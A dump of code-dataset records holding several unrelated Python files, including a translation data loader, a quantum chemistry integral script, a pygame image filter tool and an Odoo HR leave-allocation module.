'data/WMT14/processed/train.cs_en.sample.tsv'\r\n\r\n\tto_delete = [r'"',r''']\r\n\r\n\tdef tokenize(text):\r\n\t for p in to_delete:\r\n\t text = re.sub(p,'',text)\r\n\t text = text.translate(str.maketrans('', '', string.punctuation))\r\n\t text = re.sub(r'\\d+',r'num',text)\r\n\t return [x.text for x in tok(text) if x.text != ' ']\r\n\r\n\tCZ = Field(lower=True,tokenize=tokenize,eos_token='')\r\n\tEN = Field(lower=True,tokenize=tokenize,eos_token='',init_token='')\r\n\r\n\tdata_ds = TabularDataset(data_path,'tsv',[('src',CZ),('trg',EN)],skip_header=True)\r\n\ttrain,valid = data_ds.split(split_ratio=0.8)\r\n\r\n\ttrain_iter = BucketIterator(train,\r\n\t bs,\r\n\t sort_key=lambda x: interleave_keys(len(x.src),len(x.trg)),\r\n\t shuffle=True,\r\n\t sort_within_batch=True)\r\n\tvalid_iter = BucketIterator(valid,\r\n\t bs,\r\n\t sort_key=lambda x: interleave_keys(len(x.src),len(x.trg)),\r\n\t shuffle=True,\r\n\t sort_within_batch=True)\r\n\r\n\tCZ.build_vocab(data_ds.src,min_freq=2)\r\n\tEN.build_vocab(data_ds.trg,min_freq=3)\r\n\r\n\treturn train_iter, valid_iter, CZ, EN","sub_path":"src/data/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306048925","text":"import os\nimport numpy as np\n\nclass dataRebuild():\n def __init__(self, dataFileName,trainRatio = 0.7, testRatio = 0.15):\n self.DFName = dataFileName\n self.TraR = trainRatio\n self.TesR = testRatio\n self.ValR = 1 - (trainRatio + testRatio)\n self.loadData()\n self.creatTrainData()\n self.creatTestData()\n self.creatValidationData()\n\n #加载数据\n def loadData(self):\n self.Data = np.loadtxt(self.DFName)\n print(self.Data[0, :])\n self.dataNum_H = self.Data.shape[0]\n self.dataNum_D = self.Data.shape[1]\n\n #创建训练集\n def creatTrainData(self):\n if self.TraR >0 :\n self.trainData_H = int(self.dataNum_H * self.TraR)\n file = open('trainData.txt', 'w')\n for i in self.Data[0 : self.trainData_H, :]:\n for j in i :\n file.write('%.2f'%j + '\\t')\n file.write('\\n')\n file.close()\n print('Train data OK! SHAPE :[%s, %s]\\n'%(self.trainData_H, self.dataNum_D))\n else:\n print('No train data! \\n')\n\n # #创建测试集\n def creatTestData(self):\n if self.TesR > 0:\n self.testData_H = int(self.dataNum_H * self.TesR)\n file = open('testData.txt', 'w')\n for i in self.Data[self.trainData_H : self.trainData_H + self.testData_H, :]:\n for j in i :\n file.write('%.2f'%j + '\\t')\n file.write('\\n')\n file.close()\n print('Test data OK! SHAPE :[%s, %s]\\n'%(self.testData_H, self.dataNum_D))\n else:\n print('No test data! \\n')\n\n #创建验证集\n def creatValidationData(self):\n if self.ValR > 0:\n self.valData_H = int(self.dataNum_H * self.ValR)\n file = open('valData.txt', 'w')\n for i in self.Data[self.trainData_H + self.testData_H : self.trainData_H + self.testData_H + self.valData_H, :]:\n for j in i :\n file.write('%.2f'%j + '\\t')\n file.write('\\n')\n file.close()\n print('Validation data OK! SHAPE :[%s, %s]\\n'%(self.valData_H, self.dataNum_D))\n else:\n print('No validation data! \\n')\n\n","sub_path":"RNN_NET_19_04_17/Data_Processing.py","file_name":"Data_Processing.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212902241","text":"# (C) Copyright 2018 Anthony D. Dutoi\n# \n# This file is part of Qode.\n# \n# Qode is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# Qode is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with Qode. If not, see .\n#\n\n# Usage (within a Psi4 conda environment): python main.py \n\nimport sys\nimport numpy\nimport psi4\nimport qode.atoms.integrals.spatial_to_spin as spatial_to_spin\nimport qode.atoms.integrals.external_engines.psi4_ints as integrals\nfrom qode.many_body.self_consistent_field.fermionic import RHF_RoothanHall_Nonorthogonal\n\ndef MO_transform(H, V, C):\n H = C.T @ H @ C\n for _ in range(4): V = numpy.tensordot(V, C, axes=([0],[0])) # cycle through the tensor axes (this assumes everything is real)\n return H, V\n\n\n\n# Normal AO SCF of Be atom\nn_elec_1 = 4\nBe_1 = \"\"\"\\\nBe\n\"\"\"\nS_1, T_1, U_1, V_1, X_1 = integrals.AO_ints(Be_1, \"6-31G\")\nH_1 = T_1 + U_1\n_, _, C_1 = RHF_RoothanHall_Nonorthogonal(n_elec_1, (S_1,H_1,V_1), thresh=1e-12)\nH_1_MO, V_1_MO = MO_transform(H_1, V_1, C_1)\n\n# Set up dimer\nn_elec_2 = 8\nBe_2 = \"\"\"\\\nBe\nBe 1 {distance:f}\n\"\"\".format(distance=float(sys.argv[1]))\nS_2, T_2, U_2, V_2, X_2 = integrals.AO_ints(Be_2, \"6-31G\")\nH_2 = T_2 + U_2\nEnuc_2 = X_2.mol.nuclear_repulsion_energy()\n\n# Psi4 energy of dimer for reference\npsi4.set_output_file(\"output.dat\")\npsi4.set_options({\"scf_type\":\"pk\", \"PRINT_MOS\":\"True\"})\nprint(\"Psi4 Be2 HF energy = \", psi4.energy(\"SCF/6-31G\", molecule=X_2.mol))\n\n# Normal AO SCF Be dimer\nenergy_2, _, C_2 = RHF_RoothanHall_Nonorthogonal(n_elec_2, (S_2,H_2,V_2), thresh=1e-12)\nprint(\"As computed here = \", energy_2 + Enuc_2)\nH_2_MO, V_2_MO = MO_transform(H_2, V_2, C_2)\n\n# Put everything in terms of spin orbitals\nC_1 = spatial_to_spin.one_electron(C_1)\nH_1_MO = spatial_to_spin.one_electron(H_1_MO)\nV_1_MO = spatial_to_spin.two_electron(V_1_MO)\nS_2 = spatial_to_spin.one_electron(S_2)\nC_2 = spatial_to_spin.one_electron(C_2)\nH_2_MO = spatial_to_spin.one_electron(H_2_MO)\nV_2_MO = spatial_to_spin.two_electron(V_2_MO)\n\n# Dump to disk\nnumpy.save( \"data/Be_C.npy\", C_1)\nnumpy.save( \"data/Be_h.npy\", H_1_MO)\nnumpy.save( \"data/Be_V.npy\", V_1_MO)\nnumpy.save(\"data/Be2_{}_S.npy\".format(sys.argv[1]), S_2)\nnumpy.save(\"data/Be2_{}_C.npy\".format(sys.argv[1]), C_2)\nnumpy.save(\"data/Be2_{}_h.npy\".format(sys.argv[1]), H_2_MO)\nnumpy.save(\"data/Be2_{}_V.npy\".format(sys.argv[1]), V_2_MO)\n","sub_path":"QODE/Applications/GPU-pilot/atomic_states/basis.py","file_name":"basis.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"285304421","text":"print(\"PROGRAM MENGHITUNG NILAI RATA-RATA MENGGUNAKAN FOR\")\n\nn = int(input(\"\\nBanyaknya Data: \"))\n\nprint() #Membuat baris baru\ndata = []\njum = 0\n\nfor i in range(0, n):\n temp = int(input(\"Masukkan data ke-%d: \" % (i+1)))\n data.append(temp)\n jum += data[i]\n rata2 = jum / n\n\nprint(\"\\nRata-rata = %0.2f\" % rata2)","sub_path":"I0320021_Soal2_Tugas6.py","file_name":"I0320021_Soal2_Tugas6.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"218045384","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\ncli.py\n\nCopyleft (C) 2017 Magnus Lindström \n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU Affero General Public License as published by the Free\nSoftware Foundation, either version 3 of the License, or (at your option) any\nlater version.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\nPARTICULAR PURPOSE. See the GNU Affero General Public License for more details.\n\nYou should have received a copy of the GNU Affero General Public License along\nwith this program. If not, see .\n\n\"\"\"\n# Standard libs\nfrom optparse import OptionParser\n\nparser = OptionParser(usage=\"usage: %prog [options] argument\", version=\"%prog 0.1\")\n\n\ndef cli(parser):\n\n parser.add_option(\"-p\", \"--path\", dest=\"path\", help=\"Path to base directory.\")\n parser.add_option(\"-f\", \"--file\", dest=\"file\", help=\"Name of file.\")\n parser.add_option(\"-n\", \"--name\", dest=\"name\", help=\"Name of project\")\n parser.add_option(\"-e\", \"--env\", dest=\"enviroment\", help=\"Specify which python enviroment to use.\")\n (options, args) = parser.parse_args()\n\n arg = vars(options)\n pwd = str(arg[\"path\"])\n fname = str(arg[\"file\"])\n project_name = str(arg[\"name\"])\n version = str(arg[\"enviroment\"])\n if arg[\"enviroment\"]==None:\n version = \"\"\n\n pwd = \"{}/\".format(pwd)\n\n return pwd, fname, project_name, version\n\n\n","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67690007","text":"def inversia(x,y):\n a=pygame.display.set_mode((x,y))\n root=tkinter.Tk()\n label=tkinter.Label(text='0%')\n label.pack()\n global image\n global proc1\n a.blit(image,(0,0))\n pygame.display.update()\n for i in range(0,x):\n for j in range(0,y):\n color=a.get_at((i,j))\n a.set_at((i,j),(255-color[0],255-color[1],255-color[2]))\n proc=((i+1)*y)//proc1\n label['text']=str(proc)+\"%\"\n root.update()\n label['text'] = \"100%\"\n root.update()\ndef black_white(x,y):\n a=pygame.display.set_mode((x,y))\n root = tkinter.Tk()\n label = tkinter.Label(text='0%')\n label.pack()\n global image\n global proc1\n a.blit(image,(0,0))\n pygame.display.update()\n for i in range(0,x):\n for j in range(0,y):\n color = a.get_at((i, j))\n t=(color[0]+color[1]+color[2])//3\n a.set_at((i, j), (t,t,t))\n proc = ((i+1) * y) // proc1\n label['text'] = str(proc) + \"%\"\n root.update()\n label['text'] = \"100%\"\n root.update()\ndef piksel(x,y):\n pygame.display.quit()\n global image\n global proc1\n l=int(input(\"на сколько пикселей будет 1 пиксель?\"))\n a=pygame.display.set_mode((x,y))\n a.blit(image, (0, 0))\n pygame.display.update()\n root = tkinter.Tk()\n label = tkinter.Label(text='0%')\n label.pack()\n e=x\n r=y\n for i in range(0, e, l):\n for j in range(0, r, l):\n b = []\n R = 0\n B = 0\n G = 0\n for k in range(i, i + l):\n for n in range(j, j + l):\n try:\n m = a.get_at((k, n))\n b.append(m)\n R += m[0]\n G += m[1]\n B += m[2]\n except:\n pass\n if e - i >= l and r - j >= l:\n R //= l * l\n B //= l * l\n G //= l * l\n elif e - i >= l:\n R //= l * (r - j)\n B //= l * (r - j)\n G //= l * (r - j)\n elif r - j >= l:\n R //= (e - i) * l\n B //= (e - i) * l\n G //= (e - i) * l\n else:\n R //= (e - i) * (r - j)\n B //= (e - i) * (r - j)\n G //= (e - i) * (r - j)\n for k in range(i, i + l):\n for n in range(j, j + l):\n try:\n a.set_at((k, n), (R, G, B))\n except:\n pass\n proc = ((i + 1) * y) // proc1\n label['text'] = str(proc) + \"%\"\n root.update()\n label['text'] = \"100%\"\n root.update()\nimport pygame\n\nimport tkinter\n\nimage_name=input(\"Введите название изображения, которое нужно отредактировать:\")\ntry:\n image = pygame.image.load(image_name)\nexcept:\n print(\"Такого файла не существует!\")\nelse:\n x=-1\n y=-1\n w=str(image)\n e=''\n for i in range(9,len(w)-5):\n if w[i]==\"x\":\n if x==-1:\n x=int(e)\n elif y==-1:\n y=int(e)\n e = ''\n else:e+=w[i]\n proc1=x*y//100\n a=pygame.display.set_mode((1000,500))\n game.write(a, \"что вы хотите сделать с этим изображением?\", (255, 255, 255), (10, 10), 50)\n commands=['инверсия','черно белый','пиксельная']\n for i in range(50,500,50):\n pygame.draw.line(a,(255,255,255),(0,i),(1000,i))\n for i in range(len(commands)):\n game.write(a,commands[i],(255,255,255),(10,i*50+110),50)\n pygame.display.update()\n h=1\n while h:\n for event in pygame.event.get():\n if event.type==pygame.MOUSEBUTTONDOWN:\n pos=game.mouse_pos()\n h=0\n if 100 (365 * 2) and (today_date - joining_date).days <= (365 * 8) and int(self.no_of_days + leave_days) != 14:\n# if leave_days > 0.0:\n# reason = ('The leave is already allocated to (Employee Name). If you wish to change the allocation, please refuse the allocated leave, Reset it to Draft and proceed with the changes.')\n# else:\n# reason = ('Leave allocation should be 14 days for the employees equal or greater than 2 years of service.')\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 14 days for two year experiance Employee for %s Employee') % (emp.name))\n# if (today_date - joining_date).days > (365 * 8) and int(self.no_of_days + leave_days) != 21:\n# if leave_days > 0.0:\n# reason = ('The leave is already allocated to (Employee Name). If you wish to change the allocation, please refuse the allocated leave, Reset it to Draft and proceed with the changes.')\n# else:\n# reason = ('Leave allocation should be 21 days for the employees equal or greater than 8 years of service.')\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 21 days for eight year experiance Employee for %s Employee') % (emp.name))\n# \n# if self.holiday_status_id.name == 'CCL':\n# for emp in self.employee_ids:\n# holiday_ids = self.env['hr.holidays'].search([('employee_id', '=', emp.id),\n# ('type', '=', 'add'),\n# ('holiday_status_id', '=', self.holiday_status_id.id),\n# ('hr_year_id', '=', self.fiscal_year_id.id),\n# ])\n# leave_days = 0\n# for holiday in holiday_ids:\n# leave_days += holiday.number_of_days_temp\n# \n# temp = emp.dependent_ids and emp.dependent_ids[0].birth_date\n# if temp:\n# temp = datetime.datetime.strptime(temp, DEFAULT_SERVER_DATE_FORMAT).date()\n# for dependent in emp.dependent_ids:\n# birth = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n# if birth > temp:\n# temp = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n# if temp:\n# to_date = datetime.datetime.strptime(fields.Date.today() + \" 00:00:00\", DEFAULT_SERVER_DATETIME_FORMAT).date()\n# temp = temp + relativedelta(years=7)\n# \n# if emp.singaporean:\n# if to_date > temp:\n# reason = ('Child should below 7 year old, of %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Child should below 7 year old, of %s Employee') % (emp.name))\n# if int(self.no_of_days + leave_days) != 7:\n# reason = ('You can allocate 7 days for CCL Leave for %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 7 days for CCL Leave for %s Employee') % (emp.name))\n# if not emp.singaporean:\n# if to_date > temp:\n# reason = ('Child should below 7 year old, of %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Child should below 7 year old, of %s Employee') % (emp.name))\n# if int(self.no_of_days + leave_days) != 2:\n# reason = ('You can allocate 2 days for CCL Leave for %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 2 days for CCL Leave for %s Employee') % (emp.name))\n# else:\n# reason = ('Employee %s does not have configure Child.') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Employee %s does not have configure Child.') % (emp.name))\n# \n# if self.holiday_status_id.name == 'ECCL':\n# for emp in self.employee_ids:\n# if emp.singaporean:\n# holiday_ids = self.env['hr.holidays'].search([('employee_id', '=', emp.id),\n# ('type', '=', 'add'),\n# ('holiday_status_id', '=', self.holiday_status_id.id),\n# ('hr_year_id', '=', self.fiscal_year_id.id),\n# ])\n# leave_days = 0\n# for holiday in holiday_ids:\n# leave_days += holiday.number_of_days_temp\n# \n# temp = emp.dependent_ids and emp.dependent_ids[0].birth_date\n# if temp:\n# temp = datetime.datetime.strptime(temp, DEFAULT_SERVER_DATE_FORMAT).date()\n# for dependent in emp.dependent_ids:\n# birth = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n# if birth > temp:\n# temp = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n# if temp:\n# to_date = datetime.datetime.strptime(fields.Date.today() + \" 00:00:00\", DEFAULT_SERVER_DATETIME_FORMAT).date()\n# temp7 = temp + relativedelta(years=7)\n# temp12 = temp + relativedelta(years=12)\n# \n# if to_date <= temp7 or to_date >= temp12:\n# reason = ('Child should between 7 to 12 year old, of %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Child should between 7 to 12 year old, of %s Employee') % (emp.name))\n# if int(self.no_of_days + leave_days) != 2:\n# reason = ('You can allocate 2 days for CCL Leave for %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 2 days for CCL Leave for %s Employee') % (emp.name))\n# else:\n# reason = ('Employee %s does not have configure Child.') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Employee %s does not have configure Child.') % (emp.name))\n# \n# else:\n# reason = ('Employee %s is not applicable for Extender Childcare Leave') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Employee %s is not applicable for Extender Childcare Leave') % (emp.name))\n# \n# # res = super(allocate_leave, self).allocate_leaves()\n# for emp in self.employee_ids:\n# if emp.gender == 'male' and self.holiday_status_id.name in ['ML16','ML15','ML8','ML4']:\n# continue\n# if emp.gender == 'female' and self.holiday_status_id.name in ['PL']:\n# continue\n# if emp.id in emp_ids:\n# continue\n# leave_rec = []\n# if emp.leave_config_id and emp.leave_config_id.holiday_group_config_line_ids:\n# for leave in emp.leave_config_id.holiday_group_config_line_ids:\n# leave_rec.append(leave.leave_type_id.id)\n# if self.holiday_status_id.id in leave_rec:\n# if self.holiday_status_id.name == 'AL' and self.fiscal_year_id.code == str(datetime.datetime.today().year):\n# current_year = datetime.datetime.today().year\n# fiscal_year_id = self.env['hr.year'].search([('code', '=', str(current_year - 1))])\n# holiday_ids = self.env['hr.holidays'].search([('employee_id', '=', emp.id), \n# ('type', '=', 'add'),\n# ('holiday_status_id', '=', self.holiday_status_id.id),\n# ('hr_year_id', '=', fiscal_year_id.id),\n# ])\n# leave_days = 0\n# for holiday in holiday_ids:\n# leave_days += holiday.number_of_days_temp\n# if self.no_of_days == 21:\n# #if self.no_of_days > 28:\n# #need to implement the payroll condition where 50% salary of up to 21 or 7 days will be credited\n# if self.no_of_days == 28:\n# continue\n# if self.no_of_days < 28:\n# self.no_of_days = self.no_of_days + (28 - leave_days)\n# if self.no_of_days == 14:\n# #if self.no_of_days > 28:\n# #need to implement the payroll condition where 50% salary of up to 21 or 7 days will be credited\n# if self.no_of_days == 14:\n# continue\n# if self.no_of_days < 14:\n# self.no_of_days = self.no_of_days + (14 - leave_days)\n# vals = {\n# 'name' : 'Assign Default ' + str(self.holiday_status_id.name2),\n# 'holiday_status_id': self.holiday_status_id.id, \n# 'type': self.type,\n# 'employee_id': emp.id,\n# 'number_of_days_temp': self.no_of_days,\n# 'state': 'validate',\n# 'holiday_type' : 'employee',\n# 'hr_year_id':self.fiscal_year_id.id\n# # 'start_date':self.start_date,\n# # 'end_date':self.end_date,\n# }\n# self.env['hr.holidays'].create(vals)\n# \n# for data in reason_vals:\n# self.env['allocate.leaves.reason'].create(data)\n# # return res\n# if not reason_vals:\n# return True\n# else:\n# view_id = self.env.ref('sg_leave_types.view_allocate_leaves_info_form').id\n# return {\n# 'name': _('Allocate Leaves'),\n# 'type': 'ir.actions.act_window',\n# 'res_model': 'allocate.leaves',\n# 'view_mode': 'form',\n# 'view_type': 'form',\n# 'view_id': view_id,\n# 'target': 'new',\n# 'res_id': res_id.id,\n# }\n\nclass hr_holidays_status(models.Model):\n _inherit = \"hr.holidays.status\"\n\n @api.multi\n def get_days(self, employee_id):\n # need to use `dict` constructor to create a dict per id\n today = time.strftime(DEFAULT_SERVER_DATE_FORMAT)\n hr_year_id = self.env['hr.holidays'].fetch_hryear(today)\n result = dict((id, dict(max_leaves=0, leaves_taken=0, remaining_leaves=0,\n virtual_remaining_leaves=0)) for id in self.ids)\n holidays = self.env['hr.holidays'].search([('employee_id', '=', employee_id),\n ('state', 'not in', ['draft', 'refuse', 'cancel']),\n ('holiday_status_id', 'in', self.ids),\n ('leave_expire', '!=', True),\n ('hr_year_id','=',hr_year_id),\n ])\n for holiday in holidays:\n status_dict = result[holiday.holiday_status_id.id]\n if holiday.type == 'add':\n if holiday.state == 'validate':\n status_dict['virtual_remaining_leaves'] += holiday.number_of_days_temp\n status_dict['remaining_leaves'] += holiday.number_of_days_temp\n if not holiday.is_recovery:\n status_dict['max_leaves'] += holiday.number_of_days_temp\n elif holiday.type == 'remove': # number of days is negative\n status_dict['virtual_remaining_leaves'] -= holiday.number_of_days_temp\n if holiday.state == 'validate':\n status_dict['leaves_taken'] += holiday.number_of_days_temp\n status_dict['remaining_leaves'] -= holiday.number_of_days_temp\n return result\n\nclass HrHolidays(models.Model):\n _inherit = 'hr.holidays'\n\n @api.depends('holiday_status_id')\n def _get_child_age(self):\n for obj in self:\n if obj.holiday_status_id and obj.holiday_status_id.name in ['CCL', 'ECCL']:\n temp = obj.employee_id.dependent_ids and obj.employee_id.dependent_ids[0].birth_date\n if temp:\n temp = datetime.datetime.strptime(temp, DEFAULT_SERVER_DATE_FORMAT).date()\n for dependent in obj.employee_id.dependent_ids:\n if dependent.relation_ship in ['son', 'daughter']:\n birth = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n if birth > temp:\n temp = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n\n# birth_date = datetime.datetime.strptime(obj.child_birthdate, DEFAULT_SERVER_DATE_FORMAT).date()\n if temp:\n to_date = datetime.datetime.strptime(fields.Date.today() + \" 00:00:00\", DEFAULT_SERVER_DATETIME_FORMAT).date()\n years = relativedelta(to_date, temp).years\n months = relativedelta(to_date, temp).months\n obj.child_age = years + (months / 12.0)\n\n @api.depends('holiday_status_id')\n def _check_is_admin(self):\n for obj in self:\n if obj._uid == 1:\n obj.is_admin = True\n\n @api.depends('holiday_status_id')\n def _check_is_non_sp_child(self):\n for obj in self:\n for depend_id in obj.employee_id.dependent_ids:\n if depend_id.relation_ship in ['son', 'daughter']:\n if depend_id.singaporean:\n self.is_non_sp_child = False\n else:\n self.is_non_sp_child = True\n\n def _sg_date(self):\n date = datetime.datetime.now()\n return date\n\n applicant_date = fields.Datetime(string='Date of Application', default=_sg_date)\n attachment = fields.Binary(string=\"Add Supporting Documents\")\n attachment_name = fields.Char(string=\"Add Supporting Documents\")\n child_age = fields.Float(string=\"Childs Age\", compute=\"_get_child_age\")\n\n attachment_gppl = fields.Binary(string=\"GPPL\")\n attachment_gppl_name = fields.Char(string=\"GPPL\")\n gppl_link = fields.Char(string=\"GPPL Link\", default=\"https://www.profamilyleave.gov.sg/Documents/PDF/GPPL1%20(updated%2029062016).pdf\")\n\n attachment_splas = fields.Binary(string=\"SPLAS\")\n attachment_splas_name = fields.Char(string=\"SPLAS\")\n attachment_spl = fields.Binary(string=\"SPL\")\n attachment_spl_name = fields.Char(string=\"SPL\")\n spl_link = fields.Char(string=\"SPL Link\", default=\"https://www.profamilyleave.gov.sg/Documents/PDF/SPL1.pdf\")\n\n attachment_gmpl = fields.Binary(string=\"GPML1\")\n attachment_gmpl_name = fields.Char(string=\"GPML1\")\n gmpl_link = fields.Char(string=\"GPML1 Link\", default=\"https://www.profamilyleave.gov.sg/Documents/PDF/GPML1.pdf\")\n\n medical_certificate = fields.Binary(string=\"Medical Certificate\")\n medical_certificate_name = fields.Char(string=\"Medical Certificate\")\n\n hospital_certificate = fields.Binary(string=\"Hospital Certificate\")\n hospital_certificate_name = fields.Char(string=\"Hospital Certificate\")\n\n death_certificate = fields.Binary(string=\"Death Certificate\")\n death_certificate_name = fields.Char(string=\"Death Certificate\")\n\n relevent_certificate = fields.Binary(string=\"Relevent Certificate\")\n relevent_certificate_name = fields.Char(string=\"Relevent Certificate\")\n\n singaporean = fields.Boolean(string=\"Child Citizenship\")\n text = fields.Char(default=\"Attach agreement form from your wife (print out from SPLAS)\")\n\n is_admin = fields.Boolean(compute=\"_check_is_admin\")\n is_non_sp_child = fields.Boolean(compute=\"_check_is_non_sp_child\")\n\n @api.constrains('holiday_status_id', 'employee_id','date_from','date_to')\n def _check_employee_leave(self):\n if self._context is None:\n self._context = {}\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.pre_approved ==True:\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n qualify_date = from_date - relativedelta(days=rec.holiday_status_id.no_of_days)\n if qualify_date < datetime.datetime.today().date():\n raise ValidationError(_('%s must be applied at least %d days in advance.' % (rec.holiday_status_id.name2, rec.holiday_status_id.no_of_days)))\n return True\n\n @api.multi\n def action_approve(self):\n for holiday in self:\n holiday.write({'state': 'validate'})\n holiday.action_validate()\n# if self.env.user.partner_id.id == self.next_manager_id.id or self.next_manager_id.id == False:\n# if not self.env.user.has_group('hr_holidays.group_hr_holidays_user'):\n# raise UserError(_('Only an HR Officer or Manager can approve leave requests.'))\n# # if not self.env.user.has_group('hr_holidays.group_hr_holidays_user'):\n# # raise UserError(_('Only an HR Officer or Manager can approve leave requests.'))\n# \n# for holiday in self:\n# if (holiday.next_manager_user_id) and (self.env.user.id == holiday.next_manager_user_id.id):\n# holiday.write({'next_manager_id': self.env.user.employee_ids[0].parent_id.id,\n# 'total_approval': holiday.total_approval + 1})\n# # else:\n# # raise UserError(_('Need to approve by '+ str(self.next_manager_user_id.name)))\n# \n# if (holiday.no_of_approval == holiday.total_approval) or (holiday.next_manager_id.id == False):\n# holiday.write({'state': 'validate'})\n# holiday.action_validate()\n# else:\n# raise UserError(_('Only %s can approve leave requests.') % self.next_manager_id.name)\n\n @api.multi\n def get_approval_email(self):\n email = ''\n if self.employee_id.work_email:\n email = self.employee_id.work_email\n elif self.employee_id.user_id.partner_id.email:\n email = self.employee_id.user_id.partner_id.email\n else:\n raise Warning(_(' Warning \\n Email must be configured in %s Employee !') % (self.employee_id.name))\n# for employee_email in work_email:\n# email += employee_email + ','\n return email\n\n @api.onchange('half_day', 'date_from', 'date_to', 'holiday_status_id', 'employee_id')\n def onchange_date_from(self,date_from=False, date_to=False,half_day=False, holiday_status_id=False, employee_id=False):\n if date_from == False:\n if self.date_from and not self.half_day:\n frm_date = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_from = frm_date + relativedelta(hour=1)\n date_from = self.date_from\n if date_to == False:\n if self.date_to:\n to_date = datetime.datetime.strptime(self.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_to = to_date\n date_to = self.date_to\n if holiday_status_id == False:\n holiday_status_id = self.holiday_status_id.id\n if employee_id == False:\n employee_id = self.employee_id.id\n if half_day == False:\n half_day == False\n else:\n half_day = self.half_day\n leave_day_count = False\n if holiday_status_id and holiday_status_id != False:\n leave_day_count = self.env['hr.holidays.status'].browse(holiday_status_id).count_days_by\n if (date_from and date_to) and (date_from > date_to) and half_day == False:\n result = {'value': {}}\n date_to_with_delta = datetime.datetime.strptime(date_from, DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=4)\n result['value']['date_to'] = str(date_to_with_delta)\n return result\n# raise UserError(_('Warning!\\nThe start date must be anterior to the end date.'))\n elif (date_from and date_to) and half_day == True:\n date_to = date_from\n result = {'value': {}}\n if date_from and not date_to:\n date_to_with_delta = datetime.datetime.strptime(date_from, DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=8)\n result['value']['date_to'] = str(date_to_with_delta)\n if (date_to and date_from) and (date_from <= date_to):\n if leave_day_count != False and leave_day_count == 'working_days_only':\n diff_day = self._check_holiday_to_from_dates(date_from, date_to, employee_id)\n result['value']['number_of_days_temp'] = round(math.floor(diff_day))\n else:\n diff_day = self._get_number_of_days(date_from, date_to,employee_id)\n result['value']['number_of_days_temp'] = round(math.floor(diff_day))+ 1\n else:\n result['value']['number_of_days_temp'] = 0.0\n if date_from and date_to and half_day == True:\n date_to_with_delta = datetime.datetime.strptime(date_from, DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=4)\n result['value']['date_to'] = str(date_to_with_delta)\n if self.half_day == True:\n result['value']['number_of_days_temp'] = 0.5\n\n return result\n\n @api.onchange('half_day', 'date_from', 